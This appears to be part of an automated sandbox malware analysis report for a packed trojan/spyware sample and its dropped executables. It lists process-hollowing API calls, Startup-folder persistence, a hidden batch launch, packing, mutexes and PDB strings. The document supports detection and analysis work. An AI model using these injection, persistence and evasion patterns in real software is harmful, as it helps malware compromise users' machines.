Source: C:\Users\user\AppData\Roaming\ehdjcua	Code function: 19_2_00401831 Sleep,NtTerminateProcess,	19_2_00401831
Source: C:\Users\user\AppData\Roaming\ehdjcua	Code function: 19_2_004017FF Sleep,NtTerminateProcess,	19_2_004017FF
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Code function: 25_2_05DF7070 NtResumeThread,	25_2_05DF7070
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Code function: 25_2_05DF6398 NtUnmapViewOfSection,	25_2_05DF6398
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Code function: 25_2_05DF69B0 NtAllocateVirtualMemory,	25_2_05DF69B0
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Code function: 25_2_05DF7068 NtResumeThread,	25_2_05DF7068
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Code function: 25_2_05DF6391 NtUnmapViewOfSection,	25_2_05DF6391
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Code function: 25_2_05DF6D79 NtWriteVirtualMemory,	25_2_05DF6D79
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Code function: 25_2_05DF69A8 NtAllocateVirtualMemory,	25_2_05DF69A8

Source: C:\Users\user\Desktop\IuXJUPoEo6.exe	Code function: 1_2_0040C770	1_2_0040C770
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: 21_2_0041A041	21_2_0041A041
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: 21_2_00423804	21_2_00423804
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: 21_2_004088B0	21_2_004088B0
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: 21_2_00420171	21_2_00420171
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: 21_2_00423924	21_2_00423924
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: 21_2_0041BAB9	21_2_0041BAB9
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: 21_2_00421BED	21_2_00421BED
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: 21_2_00403C50	21_2_00403C50
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: 21_2_004146A0	21_2_004146A0
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: 21_2_00412F7B	21_2_00412F7B
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: 21_2_02F0A291	21_2_02F0A291
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: 21_2_02F13A54	21_2_02F13A54
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: 21_2_02F103C1	21_2_02F103C1
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: 21_2_02F13B74	21_2_02F13B74
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: 21_2_02EF8B00	21_2_02EF8B00
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: 21_2_02F048F0	21_2_02F048F0
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: 21_2_02F031CB	21_2_02F031CB
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: 21_2_02EF3EA0	21_2_02EF3EA0
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Code function: 25_2_02DBFB70	25_2_02DBFB70
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Code function: 25_2_02DBEB80	25_2_02DBEB80
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Code function: 25_2_02DBEB70	25_2_02DBEB70
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Code function: 25_2_02DBD14C	25_2_02DBD14C
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Code function: 25_2_05DFB3D0	25_2_05DFB3D0

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\9163.exe 188E05EFB42C1F7FDB5C910A6614F710A87AE642B23AC9FFE3F75246744865BC

Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: String function: 02EFECA0 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: String function: 0040EA50 appears 37 times

Source: C:\Users\user\AppData\Local\Temp\9675.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3412 -s 744

Source: AD1D.exe.6.dr	Static PE information: Resource name: DIFX64 type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Source: AD1D.exe.6.dr	Static PE information: Resource name: DIFX86 type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows

Source: IuXJUPoEo6.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: IuXJUPoEo6.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 9163.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 9675.exe.6.dr	Static PE information: Resource name: RT_CURSOR type: GLS_BINARY_LSB_FIRST
Source: 9675.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 9675.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 9675.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 9675.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 9675.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 9675.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 9C52.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 9C52.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: AD1D.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ehdjcua.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ehdjcua.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Runtimebroker.exe.21.dr	Static PE information: Resource name: RT_CURSOR type: GLS_BINARY_LSB_FIRST
Source: Runtimebroker.exe.21.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Runtimebroker.exe.21.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Runtimebroker.exe.21.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Runtimebroker.exe.21.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Runtimebroker.exe.21.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Runtimebroker.exe.21.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: svchostsw.exe.31.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: svchostsw.exe.31.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll			Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll			Jump to behavior

Source: IuXJUPoEo6.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_bad_module_info_db128abe1f5044de3cf7da11a66860834ebfe56e_85207d7d_1671ad43\Report.wer, type: DROPPED

Matched rule: SUSP_WER_Suspicious_Crash_Directory date = 2019-10-18, author = Florian Roth, description = Detects a crashed application executed in a suspicious directory, reference = https://twitter.com/cyb3rops/status/1185585050059976705, score =

Source: 9675.exe.6.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Runtimebroker.exe.21.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: AD1D.exe.6.dr

Static PE information: Section: ZLIB complexity 0.997775048325

Source: A329.exe.6.dr, u0007/u0006.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: A329.exe.6.dr, u0007/u0006.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: A329.exe.6.dr, u0007/u0006.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 25.2.A329.exe.9f0000.0.unpack, u0007/u0006.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 25.2.A329.exe.9f0000.0.unpack, u0007/u0006.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 25.2.A329.exe.9f0000.0.unpack, u0007/u0006.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 25.0.A329.exe.9f0000.0.unpack, u0007/u0006.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 25.0.A329.exe.9f0000.0.unpack, u0007/u0006.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 25.0.A329.exe.9f0000.0.unpack, u0007/u0006.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 30.0.A329.exe.3d0000.0.unpack, u0007/u0006.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 30.0.A329.exe.3d0000.0.unpack, u0007/u0006.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 30.0.A329.exe.3d0000.0.unpack, u0007/u0006.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 9163.exe, 9163.exe.6.dr

Binary or memory string: \RRTexture.vbp

Source: classification engine

Classification label: mal100.troj.adwa.spyw.evad.winEXE@27/42@8/6

Source: C:\Users\user\AppData\Local\Temp\9675.exe

Code function: 21_2_00403C50 GetModuleFileNameW,SHGetFolderPathW,CoInitialize,CoCreateInstance,CreateProcessW,WaitForSingleObject,CloseHandle,CloseHandle,

21_2_00403C50

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\ehdjcua

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5292:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5976:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Mutant created: \Sessions\1\BaseNamedObjects\oufh9e8fgwehfuiwef
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3412
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5404

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\9163.tmp

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\9C52.exe

Process created: C:\Windows\SysWOW64\cmd.exe cmd /Q /C C:\Users\user\AppData\Local\Temp/s.bat

Source: IuXJUPoEo6.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\9163.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\A329.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'

Source: C:\Users\user\AppData\Local\Temp\9675.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\IuXJUPoEo6.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: IuXJUPoEo6.exe	Virustotal: Detection: 29%
Source: IuXJUPoEo6.exe	ReversingLabs: Detection: 50%

Source: unknown	Process created: C:\Users\user\Desktop\IuXJUPoEo6.exe 'C:\Users\user\Desktop\IuXJUPoEo6.exe'
Source: C:\Users\user\Desktop\IuXJUPoEo6.exe	Process created: C:\Users\user\Desktop\IuXJUPoEo6.exe 'C:\Users\user\Desktop\IuXJUPoEo6.exe'
Source: unknown	Process created: C:\Users\user\AppData\Roaming\ehdjcua C:\Users\user\AppData\Roaming\ehdjcua
Source: C:\Users\user\AppData\Roaming\ehdjcua	Process created: C:\Users\user\AppData\Roaming\ehdjcua C:\Users\user\AppData\Roaming\ehdjcua
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\9163.exe C:\Users\user\AppData\Local\Temp\9163.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\9675.exe C:\Users\user\AppData\Local\Temp\9675.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\9C52.exe C:\Users\user\AppData\Local\Temp\9C52.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\A329.exe C:\Users\user\AppData\Local\Temp\A329.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\AD1D.exe C:\Users\user\AppData\Local\Temp\AD1D.exe
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3412 -s 744
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Process created: C:\Users\user\AppData\Local\Temp\A329.exe C:\Users\user\AppData\Local\Temp\A329.exe
Source: C:\Users\user\AppData\Local\Temp\9C52.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /Q /C C:\Users\user\AppData\Local\Temp/s.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5404 -s 8
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe'
Source: C:\Users\user\Desktop\IuXJUPoEo6.exe	Process created: C:\Users\user\Desktop\IuXJUPoEo6.exe 'C:\Users\user\Desktop\IuXJUPoEo6.exe'	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\9163.exe C:\Users\user\AppData\Local\Temp\9163.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\9675.exe C:\Users\user\AppData\Local\Temp\9675.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\9C52.exe C:\Users\user\AppData\Local\Temp\9C52.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\A329.exe C:\Users\user\AppData\Local\Temp\A329.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\AD1D.exe C:\Users\user\AppData\Local\Temp\AD1D.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ehdjcua	Process created: C:\Users\user\AppData\Roaming\ehdjcua C:\Users\user\AppData\Roaming\ehdjcua	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9C52.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /Q /C C:\Users\user\AppData\Local\Temp/s.bat	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Process created: C:\Users\user\AppData\Local\Temp\A329.exe C:\Users\user\AppData\Local\Temp\A329.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe	Process created: unknown unknown

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\A329.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\9675.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: IuXJUPoEo6.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: IuXJUPoEo6.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: IuXJUPoEo6.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: IuXJUPoEo6.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: IuXJUPoEo6.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: IuXJUPoEo6.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: IuXJUPoEo6.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wininet.pdb source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdbk source: WerFault.exe, 0000001B.00000003.340208137.0000000005111000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdbk source: WerFault.exe, 0000001B.00000003.340208137.0000000005111000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 0000001B.00000003.340154075.0000000005141000.00000004.00000001.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 0000001B.00000003.340154075.0000000005141000.00000004.00000001.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 0000001B.00000003.340208137.0000000005111000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 0000001B.00000003.340286255.0000000005114000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 0000001B.00000003.334109443.0000000002EBF000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdbk source: WerFault.exe, 0000001B.00000003.340286255.0000000005114000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb[, source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 0000001B.00000003.340154075.0000000005141000.00000004.00000001.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 0000001B.00000003.340208137.0000000005111000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 0000001B.00000003.340270250.0000000005110000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: ntmarta.pdb source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: CLBCatQ.pdb source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: msvcr100.i386.pdb source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: urlmon.pdb source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 0000001B.00000003.340154075.0000000005141000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 0000001B.00000003.340154075.0000000005141000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 0000001B.00000003.340154075.0000000005141000.00000004.00000001.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 0000001B.00000003.340154075.0000000005141000.00000004.00000001.sdmp
Source:	Binary string: iertutil.pdbI, source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdbs, source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: L>NC:\nasuxitoti\wanuketas\yal\yabovu fapetuxo\lekagokese\heguna.pdb source: IuXJUPoEo6.exe
Source:	Binary string: cfgmgr32.pdb#, source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: combase.pdbU, source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 0000001B.00000003.334109443.0000000002EBF000.00000004.00000001.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdbg, source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: C:\nasuxitoti\wanuketas\yal\yabovu fapetuxo\lekagokese\heguna.pdb source: IuXJUPoEo6.exe
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 0000001B.00000003.340154075.0000000005141000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 0000001B.00000003.340208137.0000000005111000.00000004.00000040.sdmp
Source:	Binary string: DIFXAPI.pdbH source: AD1D.exe, 0000001A.00000000.329415996.0000000001382000.00000002.00020000.sdmp, AD1D.exe.6.dr
Source:	Binary string: WC:\kagazejalu\wovuge-botedoyetazusu27-ziposuberedegi-83.pdb source: 9C52.exe, 00000018.00000000.319780202.0000000000429000.00000002.00020000.sdmp, svchostsw.exe, 00000026.00000000.362370409.0000000000429000.00000002.00020000.sdmp, svchostsw.exe.31.dr
Source:	Binary string: shell32.pdbO, source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: DIFXAPI.pdb_ source: AD1D.exe, 0000001A.00000000.329415996.0000000001382000.00000002.00020000.sdmp, AD1D.exe.6.dr
Source:	Binary string: C:\yilaviheyos-gacubozarijuy\cas65 disehe\xamadaficaho\zacenamij.pdb source: 9675.exe, 00000015.00000000.315333198.000000000042E000.00000002.00020000.sdmp, WerFault.exe, 0000001B.00000002.354456294.0000000005020000.00000002.00000001.sdmp, Runtimebroker.exe.21.dr
Source:	Binary string: C:\kagazejalu\wovuge-botedoyetazusu27-ziposuberedegi-83.pdb source: 9C52.exe, 00000018.00000000.319780202.0000000000429000.00000002.00020000.sdmp, svchostsw.exe, 00000026.00000000.362370409.0000000000429000.00000002.00020000.sdmp, svchostsw.exe.31.dr
Source:	Binary string: powrprof.pdb source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: iertutil.pdb source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: DIFXAPI.pdb source: AD1D.exe, 0000001A.00000000.329415996.0000000001382000.00000002.00020000.sdmp, AD1D.exe.6.dr
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000001B.00000003.340270250.0000000005110000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 0000001B.00000003.340270250.0000000005110000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdbk source: WerFault.exe, 0000001B.00000003.340208137.0000000005111000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000001B.00000003.340270250.0000000005110000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: C:\Users\79213\Documents\Visual Studio 2019\Projects\Projectrbroker\Release\RuntimeBroker.pdb source: 9675.exe
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 0000001B.00000003.340270250.0000000005110000.00000004.00000040.sdmp
Source:	Binary string: CLBCatQ.pdbm, source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: DC:\yilaviheyos-gacubozarijuy\cas65 disehe\xamadaficaho\zacenamij.pdb source: 9675.exe, 00000015.00000000.315333198.000000000042E000.00000002.00020000.sdmp, WerFault.exe, 0000001B.00000002.354456294.0000000005020000.00000002.00000001.sdmp, Runtimebroker.exe.21.dr
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 0000001B.00000003.340154075.0000000005141000.00000004.00000001.sdmp
Source:	Binary string: Z:\Oreans Projects\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: AD1D.exe, 0000001A.00000000.329638261.0000000001492000.00000080.00020000.sdmp, AD1D.exe.6.dr
Source:	Binary string: wuser32.pdb source: WerFault.exe, 0000001B.00000003.340154075.0000000005141000.00000004.00000001.sdmp
Source:	Binary string: propsys.pdbC, source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdby, source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp

Source: IuXJUPoEo6.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: IuXJUPoEo6.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: IuXJUPoEo6.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: IuXJUPoEo6.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: IuXJUPoEo6.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\IuXJUPoEo6.exe	Unpacked PE file: 4.2.IuXJUPoEo6.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\ehdjcua	Unpacked PE file: 19.2.ehdjcua.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:EW;

Source: AD1D.exe.6.dr

Static PE information: 0xCD320068 [Thu Feb 2 23:29:44 2079 UTC]

Source: C:\Users\user\Desktop\IuXJUPoEo6.exe

Code function: 1_2_00414C50 LoadLibraryA,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,

1_2_00414C50

Source: initial sample

Static PE information: section where entry point is pointing to: .themida

Source: AD1D.exe.6.dr

Static PE information: real checksum: 0x15e3f7a4 should be: 0x3fdf77

Source: AD1D.exe.6.dr	Static PE information: section name:
Source: AD1D.exe.6.dr	Static PE information: section name:
Source: AD1D.exe.6.dr	Static PE information: section name: .themida

Source: C:\Users\user\Desktop\IuXJUPoEo6.exe	Code function: 1_2_00C416CC pushad ; ret	1_2_00C416CD
Source: C:\Users\user\Desktop\IuXJUPoEo6.exe	Code function: 1_2_00C412AC push eax; ret	1_2_00C412AD
Source: C:\Users\user\Desktop\IuXJUPoEo6.exe	Code function: 1_2_00C4C1EF push ebp; iretd	1_2_00C4C1F0
Source: C:\Users\user\Desktop\IuXJUPoEo6.exe	Code function: 1_2_00C481F0 pushad ; retf	1_2_00C481F4
